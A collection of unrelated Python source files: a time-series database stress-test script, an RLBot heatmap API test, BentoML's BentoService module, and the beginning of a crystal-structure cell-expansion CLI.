time_delta = time.time() - last_time
# Send the current stats to the queue
status.put([process, count, int(count / time_delta)])
# Make a new metric
metric = self.metrics[random.randint(0, len(self.metrics)-1)]
metric_time = int(random.randint(ONE_YEAR_AGO, NOW))
amount = random.randint(0, 1000000)
tag = "stressTest"
# InfluxDB requires a different format and doesn't support tags
if self.engine == "influxdb":
# collectd_test_01.memory.memory.cached.value 2335620000 1404405000
message = "%s.%s %s %s\n" % (tag, metric, amount, metric_time)
# OpenTSDB and KairosDB are pretty similar though
else:
# put memory.memory.cached.value 1404405000000 2335620000 host=collectd_test_01
message = "put %s %s %s host=%s\n" % (metric, metric_time*1000, amount, tag)
# Send message
try:
data = open_sockets[fileNum].send(message)
except SocketError:
# Stop watching this socket
self.epoll.modify(fileNum, 0)
elif self.os == 'darwin':
revents = kq.control(ev, 1, None)
for event in revents:
if event.filter == select.KQ_FILTER_WRITE:
count += 1
if count % 5000 == 0:
time_delta = time.time() - last_time
# Send the current stats to the queue
status.put([process, count, int(count / time_delta)])
# Make a new metric
metric = self.metrics[random.randint(0, len(self.metrics)-1)]
metric_time = int(random.randint(ONE_YEAR_AGO, NOW))
amount = random.randint(0, 1000000)
tag = "stressTest"
# InfluxDB requires a different format and doesn't support tags
if self.engine == "influxdb":
# collectd_test_01.memory.memory.cached.value 2335620000 1404405000
message = "%s.%s %s %s\n" % (tag, metric, amount, metric_time)
# OpenTSDB and KairosDB are pretty similar though
else:
# put memory.memory.cached.value 1404405000000 2335620000 host=collectd_test_01
message = "put %s %s %s host=%s\n" % (metric, metric_time*1000, amount, tag)
# Send message
try:
data = open_sockets[event.ident].send(message)
except SocketError:
# Stop watching this socket
pass
# Stop sending when we reach limit of metrics specified
if (count*self.threads) == self.amount:
# Break out of while loop
time_delta = time.time() - last_time
status.put([process, count, int(count / time_delta)])
break
finally:
for client_socket in open_sockets:
# Should probably clean up sockets here
pass
elif self.api == "http":
if self.engine == "influxdb":
self.remote = 'localhost'
self.url = 'http://localhost:8086/db/graphite/series?u=brandon&p=password'
elif self.engine == "kairosdb":
self.remote = 'localhost'
self.url = 'http://localhost:8080/api/v1/datapoints'
while True:
# Read the next 100 lines in the csv file
count += 1
data = file.readline().split(", ")
if len(data) is not 4:
return 0
metric = data[0]
metric_time = data[1][:10]
amount = data[2]
tag = data[3].rstrip('\n')
if self.engine == "kairosdb":
payload = [
{
'name': metric+self.suffix,
'timestamp': int(metric_time) * 1000,
'value': amount,
'tags': {
'host': tag
}
}
]
elif self.engine == "influxdb":
payload = [
{
'name': metric+self.suffix,
'columns': ['time', 'value'],
'points': [
[int(metric_time) * 1000, amount]
]
}
]
requests.post(self.url, data=json.dumps(payload))
# Stop sending when we reach limit of metrics specified
if count > self.amount:
# Break out of while loop
break
"""
Main run function
"""
def run(self):
self._setup()
print "Max rate: %d metrics/sec" % self.max
def main():
"""Parse arguments and run program"""
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--engine", help="influxdb | opentsdb | kairosdb", required=True)
parser.add_argument("-a", "--api", help="telnet | http", required=True)
parser.add_argument("-amt", "--amount", help="number of metrics to send", type=int, required=True)
parser.add_argument("-t", "--threads", help="number of threads to use; must be the same as number "
"of csv files in data/ directory", type=int, required=True)
parser.add_argument("-c", "--connections", help="number of sockets to open", type=int, required=True)
parser.add_argument("remote", help="IP of remote host")
parser.add_argument("port", help="Port of remote host", type=int)
args = parser.parse_args()
mp = MetricPusher(args.engine, args.api, args.amount, args.threads, args.connections, args.remote, args.port)
mp.run()
return 0
if __name__ == "__main__":
sys.exit(main())
|
heatmaps_test.py
|
import base64
import json
import logging
import time
import zlib
import requests
from RLBotServer import start_server
from backend.blueprints.spa_api.service_layers.replay.enums import HeatMapType
from backend.tasks.add_replay import save_replay
from tests.utils.killable_thread import KillableThread
from tests.utils.replay_utils import write_proto_pandas_to_file, get_test_file, download_replay_discord
from backend.utils.file_manager import PANDAS_EXTENSION, PROTO_EXTENSION
LOCAL_URL = 'http://localhost:8000'
class Test_Heatmaps:
@classmethod
def setup_class(cls):
logging.basicConfig(level=logging.ERROR)
cls.thread = KillableThread(target=start_server)
cls.thread.daemon = True
cls.thread.start()
print('waiting for a bit')
time.sleep(5)
print('done waiting')
def test_heatmaps(self, use_test_paths, temp_file):
use_test_paths.patch()
test_path = use_test_paths.get_temp_path()
proto, pandas, proto_game = write_proto_pandas_to_file(get_test_file("ALL_STAR.replay",
is_replay=True))
with open(proto, 'rb') as f:
encoded_proto = base64.b64encode(zlib.compress(f.read())).decode()
obj = {
'status': '200',
'proto': encoded_proto
}
r = requests.post(LOCAL_URL + '/api/upload/proto', json=obj)
r.raise_for_status()
assert(r.status_code == 200)
save_replay(proto_game, temp_file, pandas[:-len(PANDAS_EXTENSION)], proto[:-len(PROTO_EXTENSION)])
r = requests.get(LOCAL_URL + '/api/global/replay_count')
result = json.loads(r.content)
assert int(result) > 0, 'This test can not run without a replay in the database'
# test default
self.assert_heatmap(proto_game, has_ball=True)
# test query params
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.POSITIONING.value}, has_ball=True)
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.BOOST.value})
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.BOOST_COLLECT.value})
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.BOOST_SPEED.value})
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.SLOW_SPEED.value})
def assert_heatmap(self, proto_game, query_params=None, has_ball=False):
id = proto_game.game_metadata.match_guid
r = requests.get(LOCAL_URL + '/api/replay/' + id + '/heatmaps',
params=query_params)
r.raise_for_status()
assert r.status_code == 200
result = json.loads(r.content)
assert 'data' in result
assert 'maxs' in result
def assert_keys(value):
if has_ball:
assert 'ball' in value
assert proto_game.players[0].name in value
assert_keys(result['data'])
assert_keys(result['maxs'])
@classmethod
def teardown_class(cls):
try:
cls.thread.terminate()
except:
pass
cls.thread.join()
time.sleep(2)
|
__init__.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tempfile
import threading
import uuid
from datetime import datetime
from typing import List
from bentoml import config
from bentoml.adapters import BaseInputAdapter, BaseOutputAdapter, DefaultOutput
from bentoml.configuration import get_bentoml_deploy_version
from bentoml.exceptions import BentoMLException, InvalidArgument, NotFound
from bentoml.saved_bundle import save_to_dir
from bentoml.saved_bundle.config import SavedBundleConfig
from bentoml.saved_bundle.pip_pkg import seek_pip_packages
from bentoml.service.artifacts import ArtifactCollection, BentoServiceArtifact
from bentoml.service.env import BentoServiceEnv
from bentoml.service.inference_api import InferenceAPI
from bentoml.utils.hybridmethod import hybridmethod
ARTIFACTS_DIR_NAME = "artifacts"
DEFAULT_MAX_LATENCY = config("marshal_server").getint("default_max_latency")
DEFAULT_MAX_BATCH_SIZE = config("marshal_server").getint("default_max_batch_size")
BENTOML_RESERVED_API_NAMES = [
"index",
"swagger",
"docs",
"healthz",
"metrics",
"feedback",
]
logger = logging.getLogger(__name__)
prediction_logger = logging.getLogger("bentoml.prediction")
def validate_inference_api_name(api_name: str):
if not api_name.isidentifier():
raise InvalidArgument(
"Invalid API name: '{}', a valid identifier may only contain letters,"
" numbers, underscores and not starting with a number.".format(api_name)
)
if api_name in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API name: '{}' is reserved for infra endpoints".format(api_name)
)
def api_decorator(
*args,
input: BaseInputAdapter = None,
output: BaseOutputAdapter = None,
api_name: str = None,
api_doc: str = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
batch=False,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param input: InputAdapter instance of the inference API
:param output: OutputAdapter instance of the inference API
:param api_name: API name, default to the user-defined callback function's function
name
:param api_doc: user-facing documentation of the inference API. default to the
user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(input=JsonInput(), batch=True)
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(input=DataframeInput(input_json_orient='records'), batch=True)
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
validate_inference_api_name(_api_name)
_api_doc = func.__doc__ if api_doc is None else api_doc
if input is None:
# Raise error when input adapter class passed without instantiation
if not args or not (
inspect.isclass(args[0]) and issubclass(args[0], BaseInputAdapter)
):
raise InvalidArgument(
"BentoService @api decorator first parameter must "
"be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter "
)
# noinspection PyPep8Naming
InputAdapter = args[0]
input_adapter = InputAdapter(*args[1:], **kwargs)
output_adapter = DefaultOutput()
else:
assert isinstance(input, BaseInputAdapter), (
"API input parameter must be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter"
)
input_adapter = input
output_adapter = output or DefaultOutput()
setattr(func, "_is_api", True)
setattr(func, "_input_adapter", input_adapter)
setattr(func, "_output_adapter", output_adapter)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_mb_max_batch_size", mb_max_batch_size)
setattr(func, "_mb_max_latency", mb_max_latency)
setattr(func, "_batch", batch)
return func
return decorator
def web_static_content_decorator(web_static_content):
"""Define web UI static files required to be bundled with a BentoService
Args:
web_static_content: path to directory containg index.html and static dir
>>> @web_static_content('./ui/')
>>> class MyMLService(BentoService):
>>> pass
"""
def decorator(bento_service_cls):
bento_service_cls._web_static_content = web_static_content
return bento_service_cls
return decorator
def artifacts_decorator(artifacts: List[BentoServiceArtifact]):
"""Define artifacts required to be bundled with a BentoService
Args:
artifacts (list(bentoml.artifact.BentoServiceArtifact)): A list of desired
artifacts required by this BentoService
"""
def decorator(bento_service_cls):
artifact_names = set()
for artifact in artifacts:
if not isinstance(artifact, BentoServiceArtifact):
raise InvalidArgument(
"BentoService @artifacts decorator only accept list of "
"BentoServiceArtifact instances, instead got type: '%s'"
% type(artifact)
)
if artifact.name in artifact_names:
raise InvalidArgument(
"Duplicated artifact name `%s` detected. Each artifact within one"
"BentoService must have an unique name" % artifact.name
)
artifact_names.add(artifact.name)
bento_service_cls._declared_artifacts = artifacts
return bento_service_cls
return decorator
def env_decorator(
pip_dependencies: List[str] = None,
pip_packages: List[str] = None,
pip_index_url: str = None,
pip_trusted_host: str = None,
pip_extra_index_url: str = None,
auto_pip_dependencies: bool = False,
infer_pip_packages: bool = False,
requirements_txt_file: str = None,
conda_channels: List[str] = None,
conda_overwrite_channels: bool = False,
conda_dependencies: List[str] = None,
conda_env_yml_file: str = None,
setup_sh: str = None,
docker_base_image: str = None,
zipimport_archives: List[str] = None,
):
"""Define environment and dependencies required for the BentoService being created
Args:
pip_packages:: list of pip_packages required, specified by package name
or with specified version `{package_name}=={package_version}`
pip_dependencies: same as pip_packages but deprecated
pip_index_url: passing down to pip install --index-url option
pip_trusted_host: passing down to pip install --trusted-host option
pip_extra_index_url: passing down to pip install --extra-index-url option
infer_pip_packages: whether to automatically find all the required
pip dependencies and pin their version
auto_pip_dependencies: same as infer_pip_packages but deprecated
requirements_txt_file: pip dependencies in the form of a requirements.txt file,
this can be a relative path to the requirements.txt file or the content
of the file
conda_channels: list of extra conda channels to be used
conda_overwrite_channels: Turn on to make conda_channels overwrite the list of
channels instead of adding to it
conda_dependencies: list of conda dependencies required
conda_env_yml_file: use a pre-defined conda environment yml file
setup_sh: user defined setup bash script, it is executed in docker build time
docker_base_image: used for customizing the docker container image built with
BentoML saved bundle. Base image must either have both `bash` and `conda`
installed; or have `bash`, `pip`, `python` installed, in which case the user
is required to ensure the python version matches the BentoService bundle
zipimport_archives: list of zipimport archives paths relative to the module path
"""
def decorator(bento_service_cls):
bento_service_cls._env = BentoServiceEnv(
pip_packages=pip_packages or pip_dependencies,
pip_index_url=pip_index_url,
pip_trusted_host=pip_trusted_host,
pip_extra_index_url=pip_extra_index_url,
infer_pip_packages=infer_pip_packages or auto_pip_dependencies,
requirements_txt_file=requirements_txt_file,
conda_channels=conda_channels,
conda_overwrite_channels=conda_overwrite_channels,
conda_dependencies=conda_dependencies,
conda_env_yml_file=conda_env_yml_file,
setup_sh=setup_sh,
docker_base_image=docker_base_image,
zipimport_archives=zipimport_archives,
)
return bento_service_cls
return decorator
def ver_decorator(major, minor):
"""Decorator for specifying the version of a custom BentoService.
Args:
major (int): Major version number for Bento Service
minor (int): Minor version number for Bento Service
BentoML uses semantic versioning for BentoService distribution:
* MAJOR is incremented when you make breaking API changes
* MINOR is incremented when you add new functionality without breaking the
existing API or functionality
* PATCH is incremented when you make backwards-compatible bug fixes
'Patch' is provided(or auto generated) when calling BentoService#save,
while 'Major' and 'Minor' can be defined with '@ver' decorator
>>> from bentoml import ver, artifacts
>>> from bentoml.service.artifacts.common import PickleArtifact
>>>
>>> @ver(major=1, minor=4)
>>> @artifacts([PickleArtifact('model')])
>>> class MyMLService(BentoService):
>>> pass
>>>
>>> svc = MyMLService()
>>> svc.pack("model", trained_classifier)
>>> svc.set_version("2019-08.iteration20")
>>> svc.save()
>>> # The final produced BentoService bundle will have version:
>>> # "1.4.2019-08.iteration20"
"""
def decorator(bento_service_cls):
bento_service_cls._version_major = major
bento_service_cls._version_minor = minor
return bento_service_cls
return decorator
def validate_version_str(version_str):
"""
Validate that version str format is either a simple version string that:
* Consist of only ALPHA / DIGIT / "-" / "." / "_"
* Length between 1-128
Or a valid semantic version https://github.com/semver/semver/blob/master/semver.md
"""
regex = r"[A-Za-z0-9_.-]{1,128}\Z"
semver_regex = r"^(?P<major>0|[1-9]\d*)\.(?P<minor>0|[1-9]\d*)\.(?P<patch>0|[1-9]\d*)(?:-(?P<prerelease>(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+(?P<buildmetadata>[0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # noqa: E501
if (
re.match(regex, version_str) is None
and re.match(semver_regex, version_str) is None
):
raise InvalidArgument(
'Invalid BentoService version: "{}", it can only consist'
' ALPHA / DIGIT / "-" / "." / "_", and must be less than'
"128 characters".format(version_str)
)
if version_str.lower() == "latest":
raise InvalidArgument('BentoService version can not be set to "latest"')
def save(bento_service, base_path=None, version=None, labels=None):
"""
Save and register the given BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and metadata
in local file system under the $BENTOML_HOME(~/bentoml) directory. Users can also
configure BentoML to save their BentoService to a shared Database and cloud object
storage such as AWS S3.
:param bento_service: target BentoService instance to be saved
:param base_path: optional - override repository base path
:param version: optional - save with version override
:param labels: optional - user defined labels
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import YataiClient
from bentoml.yatai.yatai_service import get_yatai_service
if base_path:
yatai_service = get_yatai_service(repo_base_url=base_path)
yatai_client = YataiClient(yatai_service)
else:
yatai_client = YataiClient()
return yatai_client.repository.upload(bento_service, version, labels)
class BentoService:
"""
BentoService is the base component for building prediction services using BentoML.
BentoService provide an abstraction for describing model artifacts and environment
dependencies required for a prediction service. And allows users to create inference
APIs that defines the inferencing logic and how the underlying model can be served.
Each BentoService can contain multiple models and serve multiple inference APIs.
Usage example:
>>> from bentoml import BentoService, env, api, artifacts
>>> from bentoml.adapters import DataframeInput
>>> from bentoml.frameworks.sklearn import SklearnModelArtifact
>>>
>>> @artifacts([SklearnModelArtifact('clf')])
>>> @env(pip_packages=["scikit-learn"])
>>> class MyMLService(BentoService):
>>>
>>> @api(input=DataframeInput(), batch=True)
>>> def predict(self, df):
>>> return self.artifacts.clf.predict(df)
>>>
>>> if __name__ == "__main__":
>>> bento_service = MyMLService()
>>> bento_service.pack('clf', trained_classifier_model)
>>> bento_service.save_to_dir('/bentoml_bundles')
"""
# List of inference APIs that this BentoService provides
_inference_apis: List[InferenceAPI] = []
# Name of this BentoService. It is default the class name of this BentoService class
_bento_service_name: str = None
# For BentoService loaded from saved bundle, this will be set to the path of bundle.
# When user install BentoService bundle as a PyPI package, this will be set to the
# installed site-package location of current python environment
_bento_service_bundle_path: str = None
# List of artifacts required by this BentoService class, declared via the `@env`
# decorator. This list is used for initializing an empty ArtifactCollection when
# the BentoService class is instantiated
_declared_artifacts: List[BentoServiceArtifact] = []
# An instance of ArtifactCollection, containing all required trained model artifacts
_artifacts: ArtifactCollection = None
# A `BentoServiceEnv` instance specifying the required dependencies and all system
# environment setups
_env = None
# When loading BentoService from saved bundle, this will be set to the version of
# the saved BentoService bundle
_bento_service_bundle_version = None
# See `ver_decorator` function above for more information
_version_major = None
_version_minor = None
# See `web_static_content` function above for more
_web_static_content = None
def __init__(self):
# When creating BentoService instance from a saved bundle, set version to the
# version specified in the saved bundle
self._bento_service_version = self.__class__._bento_service_bundle_version
self._config_artifacts()
self._config_inference_apis()
self._config_environments()
self._dev_server_bundle_path: tempfile.TemporaryDirectory = None
self._dev_server_interrupt_event: multiprocessing.Event = None
self._dev_server_process: subprocess.Process = None
def _config_environments(self):
self._env = self.__class__._env or BentoServiceEnv()
for api in self._inference_apis:
self._env.add_pip_packages(api.input_adapter.pip_dependencies)
self._env.add_pip_packages(api.output_adapter.pip_dependencies)
for artifact in self.artifacts.get_artifact_list():
artifact.set_dependencies(self.env)
def _config_inference_apis(self):
self._inference_apis = []
for _, function in inspect.getmembers(
self.__class__,
predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
):
if hasattr(function, "_is_api"):
api_name = getattr(function, "_api_name")
api_doc = getattr(function, "_api_doc")
input_adapter = getattr(function, "_input_adapter")
output_adapter = getattr(function, "_output_adapter")
mb_max_latency = getattr(function, "_mb_max_latency")
mb_max_batch_size = getattr(function, "_mb_max_batch_size")
batch = getattr(function, "_batch")
# Bind api method call with self(BentoService instance)
user_func = function.__get__(self)
self._inference_apis.append(
InferenceAPI(
self,
api_name,
api_doc,
input_adapter=input_adapter,
user_func=user_func,
output_adapter=output_adapter,
mb_max_latency=mb_max_latency,
mb_max_batch_size=mb_max_batch_size,
batch=batch,
)
)
def _config_artifacts(self):
self._artifacts = ArtifactCollection.from_artifact_list(
self._declared_artifacts
)
if self._bento_service_bundle_path:
# For pip installed BentoService, artifacts directory is located at
# 'package_path/artifacts/', but for loading from bundle directory, it is
# in 'path/{service_name}/artifacts/'
if os.path.isdir(
os.path.join(self._bento_service_bundle_path, ARTIFACTS_DIR_NAME)
):
artifacts_path = os.path.join(
self._bento_service_bundle_path, ARTIFACTS_DIR_NAME
)
else:
artifacts_path = os.path.join(
self._bento_service_bundle_path, self.name, ARTIFACTS_DIR_NAME
)
self.artifacts.load_all(artifacts_path)
@property
def inference_apis(self):
"""Return a list of user defined API functions
Returns:
list(InferenceAPI): List of Inference API objects
"""
return self._inference_apis
def get_inference_api(self, api_name):
"""Find the inference API in this BentoService with a specific name.
When the api_name is None, this returns the first Inference API found in the
`self.inference_apis` list.
:param api_name: the target Inference API's name
:return:
"""
if api_name:
try:
return next(
(api for api in self.inference_apis if api.name == api_name)
)
except StopIteration:
raise NotFound(
"Can't find API '{}' in service '{}'".format(api_name, self.name)
)
elif len(self.inference_apis) > 0:
return self.inference_apis[0]
else:
raise NotFound(f"Can't find any inference API in service '{self.name}'")
@property
def artifacts(self):
""" Returns the ArtifactCollection instance specified with this BentoService
class
Returns:
artifacts(ArtifactCollection): A dictionary of packed artifacts from the
artifact name to the BentoServiceArtifact instance
"""
return self._artifacts
@property
def env(self):
return self._env
@property
def web_static_content(self):
return self._web_static_content
def get_web_static_content_path(self):
if not self.web_static_content:
return None
if self._bento_service_bundle_path:
return os.path.join(
self._bento_service_bundle_path, self.name, 'web_static_content'
)
else:
return os.path.join(os.getcwd(), self.web_static_content)
@hybridmethod
@property
def name(self):
"""
:return: BentoService name
"""
return self.__class__.name() # pylint: disable=no-value-for-parameter
@name.classmethod
def name(cls): # pylint: disable=no-self-argument,invalid-overridden-method
"""
:return: BentoService name
"""
if cls._bento_service_name is not None:
if not cls._bento_service_name.isidentifier():
raise InvalidArgument(
'BentoService#_bento_service_name must be valid python identifier'
'matching regex `(letter|"_")(letter|digit|"_")*`'
)
return cls._bento_service_name
else:
# Use python class name as service name
return cls.__name__
def set_version(self, version_str=None):
"""Set the version of this BentoService instance. Once the version is set
explicitly via `set_version`, the `self.versioneer` method will no longer be
invoked when saving this BentoService.
"""
if version_str is None:
version_str = self.versioneer()
if self._version_major is not None and self._version_minor is not None:
# BentoML uses semantic versioning for BentoService distribution
# when user specified the MAJOR and MINOR version number along with
# the BentoService class definition with '@ver' decorator.
# The parameter version(or auto generated version) here will be used as
# PATCH field in the final version:
version_str = ".".join(
[str(self._version_major), str(self._version_minor), version_str]
)
validate_version_str(version_str)
if self.__class__._bento_service_bundle_version is not None:
logger.warning(
"Overriding loaded BentoService(%s) version:%s to %s",
self.__class__._bento_service_bundle_path,
self.__class__._bento_service_bundle_version,
version_str,
)
self.__class__._bento_service_bundle_version = None
if (
self._bento_service_version is not None
and self._bento_service_version != version_str
):
logger.warning(
"Resetting BentoService '%s' version from %s to %s",
self.name,
self._bento_service_version,
version_str,
)
self._bento_service_version = version_str
return self._bento_service_version
def versioneer(self):
"""
Function used to generate a new version string when saving a new BentoService
bundle. User can also override this function to get a customized version format
"""
datetime_string = datetime.now().strftime("%Y%m%d%H%M%S")
random_hash = uuid.uuid4().hex[:6].upper()
# Example output: '20191009135240_D246ED'
return datetime_string + "_" + random_hash
@property
def version(self):
"""
Return the version of this BentoService. If the version of this BentoService has
not been set explicitly via `self.set_version`, a new version will be generated
with the `self.versioneer` method. User can customize this version str either by
setting the version with `self.set_version` before a `save` call, or override
the `self.versioneer` method to customize the version str generator logic.
For BentoService loaded from a saved bundle, this will simply return the version
information found in the saved bundle.
:return: BentoService version str
"""
if self.__class__._bento_service_bundle_version is not None:
return self.__class__._bento_service_bundle_version
if self._bento_service_version is None:
self.set_version(self.versioneer())
return self._bento_service_version
def save(self, yatai_url=None, version=None, labels=None):
"""
Save and register this BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and
metadata in local file system under the $BENTOML_HOME(~/bentoml) directory.
Users can also configure BentoML to save their BentoService to a shared Database
and cloud object storage such as AWS S3.
:param yatai_url: optional - URL path to Yatai server
:param version: optional - save with version override
:param labels: optional - labels dictionary
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import get_yatai_client
yc = get_yatai_client(yatai_url)
return yc.repository.upload(self, version, labels)
def save_to_dir(self, path, version=None):
"""Save this BentoService along with all its artifacts, source code and
dependencies to target file path, assuming path exist and empty. If target path
is not empty, this call may override existing files in the given path.
:param path (str): Destination of where the bento service will be saved
:param version: optional - save with version override
"""
return save_to_dir(self, path, version)
@hybridmethod
def pack(self, name, *args, **kwargs):
"""
BentoService#pack method is used for packing trained model instances with a
BentoService instance and make it ready for BentoService#save.
pack(name, *args, **kwargs):
:param name: name of the declared model artifact
:param args: args passing to the target model artifact to be packed
:param kwargs: kwargs passing to the target model artifact to be packed
:return: this BentoService instance
"""
self.artifacts.get(name).pack(*args, **kwargs)
return self
@pack.classmethod
def pack(cls, *args, **kwargs): # pylint: disable=no-self-argument
"""
**Deprecated**: Legacy `BentoService#pack` class method, no longer supported
"""
raise BentoMLException(
"BentoService#pack class method is deprecated, use instance method `pack` "
"instead. e.g.: svc = MyBentoService(); svc.pack('model', model_object)"
)
def get_bento_service_metadata_pb(self):
return SavedBundleConfig(self).get_bento_service_metadata_pb()
pip_dependencies_map = None
def start_dev_server(self, port=None, enable_microbatch=False, enable_ngrok=False):
if enable_microbatch:
raise NotImplementedError(
"start_dev_server with enable_microbatch=True is not implemented"
)
if self._dev_server_process:
logger.warning(
"There is already a running dev server, "
"please call `service.stop_dev_server()` first."
)
return
try:
self._dev_server_bundle_path = tempfile.TemporaryDirectory()
self.save_to_dir(self._dev_server_bundle_path.name)
def print_log(p):
for line in p.stdout:
print(line.decode(), end='')
def run(path, interrupt_event):
my_env = os.environ.copy()
my_env["FLASK_ENV"] = "development"
cmd = [sys.executable, "-m", "bentoml", "serve", "--debug"]
if port:
cmd += ['--port', f'{port}']
if enable_microbatch:
cmd += ['--enable-microbatch']
if enable_ngrok:
cmd += ['--run-with-ngrok']
cmd += [path]
p = subprocess.Popen(
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
env=my_env,
)
threading.Thread(target=print_log, args=(p,), daemon=True).start()
interrupt_event.wait()
p.terminate()
self._dev_server_interrupt_event = multiprocessing.Event()
self._dev_server_process = multiprocessing.Process(
target=run,
args=(
self._dev_server_bundle_path.name,
self._dev_server_interrupt_event,
),
daemon=True,
)
self._dev_server_process.start()
logger.info(f"======= starting dev server on port: {port} =======")
except Exception as e: # pylint: disable=broad-except
self.stop_dev_server(skip_log=True)
raise e
def stop_dev_server(self, skip_log=False):
if self._dev_server_interrupt_event:
self._dev_server_interrupt_event.set()
self._dev_server_interrupt_event = None
if self._dev_server_process:
self._dev_server_process.join()
assert not self._dev_server_process.is_alive()
self._dev_server_process = None
elif not skip_log:
logger.warning("No dev server is running.")
if self._dev_server_bundle_path:
self._dev_server_bundle_path.cleanup()
self._dev_server_bundle_path = None
def __del__(self):
self.stop_dev_server(skip_log=True)
def infer_pip_dependencies_map(self):
if not self.pip_dependencies_map:
self.pip_dependencies_map = {}
bento_service_module = sys.modules[self.__class__.__module__]
if hasattr(bento_service_module, "__file__"):
bento_service_py_file_path = bento_service_module.__file__
reqs, unknown_modules = seek_pip_packages(bento_service_py_file_path)
self.pip_dependencies_map.update(reqs)
for module_name in unknown_modules:
logger.warning(
"unknown package dependency for module: %s", module_name
)
# Reset bentoml to configured deploy version - this is for users using
# customized BentoML branch for development but use a different stable
# version for deployment
#
# For example, a BentoService created with local dirty branch will fail
# to deploy with docker due to the version can't be found on PyPI, but
# get_bentoml_deploy_version gives the user the latest released PyPI
# version that's closest to the `dirty` branch
self.pip_dependencies_map['bentoml'] = get_bentoml_deploy_version()
return self.pip_dependencies_map
|
rexpand.py
|
# -*- coding: utf-8 -*-
import click
import time
import threading
import sys
from sagar.crystal.derive import cells_nonredundant, ConfigurationGenerator
from sagar.io.vasp import read_vasp, write_vasp
from sagar.crystal.structure import symbol2number as s2n
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.group(context_settings=CONTEXT_SETTINGS)
def cli():
pass
@cli.command('cell', short_help="Expanding primitive cell to specific range of volumes.")
@click.argument('pcell_filename', metavar='<primitive_cell_file>',
type=click.Path(exists=True, resolve_path=True, readable=True, file_okay=True))
@click.option('--comment', '-c', type=str, default='cell',
help="identifier (first word) of output files, Defualt='cell'.")
@click.option('--dimension', '-d', type=int, default=3,
help="Dimension of the system, 2 for slab. Defalut=3 for crystal")
@click.option('--volume', '-v', nargs=2, type=int, metavar='<min> <max>',
help="Expand primitive cell to supercell of volume <min> to <max>, set <min> as -1 for creating only <max> volume expanded supercells")
@click.option('--symprec', '-s', type=float, default=1e-5,
help="Symmetry precision to decide the symmetry of primitive cell. Default=1e-5")
@click.option('--comprec', '-p', type=float, default=1e-5,
help="Compare precision to judging if supercell is redundant. Defalut=1e-5")
@click.option('--verbose', '-vvv', is_flag=True, metavar='',
help="Will print verbose messages.")
def cell(pcell_filename, comment, dimension, volume, symprec, comprec, verbose):
"""
<primitive_cell_file> Primitive cell structure file, now only vasp POSCAR version5 supported.
"""
pcell = read_vasp(pcell_filename)
(min_v, max_v) = volume
if min_v == -1:
click.echo("Expanding primitive to volume {:d}".format(max_v))
_export_supercell(pcell, comment, dimension, max_v, symprec, comprec, verbose)
else:
for v in range(min_v, max_v + 1):
click.echo("Expanding primitive to volume {:d}".format(v))
_export_supercell(pcell, comment, dimension, v, symprec, comprec, verbose)
def _export_supercell(pcell, comment, dimension, v, symprec, comprec, verbose):
spinner = Spinner()
# spinner.start()
cells = cells_nonredundant(
pcell, v, dimension, symprec=symprec, comprec=comprec)
for idx, c in enumerate(cells):
if verbose:
print(" " + "No.{:d}: Processing".format(idx))
filename = '{:s}_v{:d}_id{:d}'.format(comment, v, idx)
write_vasp(c, filename)
# spinner.stop()
@cli.command('conf', short_help="Generating configurations in grid cells or supercells.")
@click.argument('cell_filename', metavar="<parent_cell_filename>")
@click.option('--comment', '-c', type=str, default='confs')
@click.option('--pmode', '-mp', type=click.Choice(['varv', 'svc', 'sc']), default='sc',
help="[varv|svc|sc] represent ['variable volume cells'|'specific volume cells'|'specific cell'] respectively. Deciding what kinds of parent cell to be used to getting configurations")
@click.option('--cmode', '-mc', type=click.Choice(['vc', 'cc']), default='cc',
help="[vc|cc] for 'variable concentration' and 'certain concentration' respectively.")
@click.option('--dimension', '-d', type=int, default=3,
help="Dimension of the system, 2 for slab. Defalut=3 for crystal")
@click.option('--volume', '-v', nargs=2, type=int, metavar='<min> <max>',
